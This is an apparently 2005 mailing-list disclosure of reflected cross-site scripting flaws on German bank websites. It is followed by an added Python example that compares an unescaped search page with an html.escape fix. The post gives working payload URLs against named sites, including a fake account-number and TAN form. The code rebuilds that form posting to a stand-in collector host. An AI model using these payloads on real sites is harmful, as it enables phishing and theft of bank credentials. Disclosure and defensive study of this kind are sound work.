Open Source and information security mailing list archives
Date: Thu Dec 22 20:02:37 2005
From: constantin.hofstetter at gmail.com (Constantin Hofstetter)
Subject: CSS (Cross Site Scripting) on Germany's second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)

I emailed the administrators 2 months ago - the only response I got was something like: "We will look into it, but we may or may not change anything on the page - who knows; we won't tell you!". I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de]

*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure [vr-ebanking.de]
*Fälschung (forgery) --> Imitation*

My local bank's website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'
<http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52>

The institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10
<http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10>

and so on..
The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phishers) could easily use the CSS (Cross Site Scripting) to create real-looking websites "within" the domain; more importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!).

This is not looking too good for my bank, but they don't listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@...il.com
mailmespam@...il.com
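The bug class behind every link in the post is the same: a search term is reflected into the page without HTML encoding, so a query that contains `">` closes the attribute it lands in and the rest of the query becomes markup. The example below is added here and is not code from the post or from any of the sites it names; it recreates the shape of the fiducia.de payload (URL-decoded) against a made-up search template, renders it once unescaped and once through `html.escape`, and then parses both results to show that the vulnerable page gains a second form and a full-page overlay while the hardened page keeps the same structure and still shows the attacker's string as plain text in the search box. The template, function names and the `attacker.invalid` host are assumptions.

```python
# Reflected XSS in a search page: the unsafe reflection beside an escaped one.
# Added example, not code from the original post or from any site it names.
# The page template, function names and the exfiltration host are assumptions.
from html import escape
from html.parser import HTMLParser

# Constructed payload modelled on the URL-decoded query in the post: it closes
# the value="..." attribute the search term is reflected into, drops an
# absolutely positioned overlay with a fake "account number + TAN" form on top
# of the real page, and ends with an unterminated attribute so the rest of the
# page's own markup is swallowed. The form action host is made up.
OVERLAY_PAYLOAD = (
    'AA"><div style="z-index:2000;position:absolute;width:90%;height:90%;'
    'background:white"><h1>Konto Erneuern</h1>'
    '<form action="http://attacker.invalid/collect" method="post">'
    'Kontonummer: <input name="acct"> TAN: <input name="tan">'
    '<input type="submit" value="Aktivieren"></form></div><input value="'
)

# Assumed search-results template: the query lands in an attribute context and
# in a text context, the two places the post's payloads break out of.
TEMPLATE = (
    '<html><body>'
    '<form><input name="search" value="{q}"></form>'
    '<p>Results for: {q}</p>'
    '</body></html>'
)


def render_vulnerable(query: str) -> str:
    """What the reflected pages in the post do: concatenate the raw query."""
    return TEMPLATE.format(q=query)


def render_hardened(query: str) -> str:
    """Escape &, <, >, " and ' so the query cannot leave either context.

    html.escape(quote=True) is the right encoder for an HTML attribute and an
    HTML text node; a value reflected into a <script> block or a URL would
    need a different encoder, which this example does not cover.
    """
    return TEMPLATE.format(q=escape(query, quote=True))


class TagCollector(HTMLParser):
    """Count start tags and keep the attributes of every <input> element."""

    def __init__(self):
        super().__init__()
        self.counts = {}
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        self.counts[tag] = self.counts.get(tag, 0) + 1
        if tag == "input":
            self.inputs.append(dict(attrs))


def count_tags(page: str) -> dict:
    """Start-tag counts as a browser's parser would see them."""
    p = TagCollector()
    p.feed(page)
    p.close()
    return p.counts


def search_box_value(page: str):
    """Value the browser would show in the search box, after entity decoding."""
    p = TagCollector()
    p.feed(page)
    p.close()
    for attrs in p.inputs:
        if attrs.get("name") == "search":
            return attrs.get("value")
    return None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("hardened", render_hardened)):
        counts = count_tags(render(OVERLAY_PAYLOAD))
        print(f"{name}: forms={counts.get('form', 0)} "
              f"divs={counts.get('div', 0)} "
              f"search box shows {search_box_value(render(OVERLAY_PAYLOAD))!r}")
```

The parse step is the check worth keeping: the vulnerable render contains three `<form>` tags (the page's own plus one per reflection point) and two `<div>` overlays, and its search box is truncated to `AA`; the hardened render contains exactly one form, no `div`, and the search box value round-trips to the complete attacker string as inert text. Note that `html.escape` is context-specific, so the same fix does not apply to a parameter reflected into JavaScript, CSS or a URL.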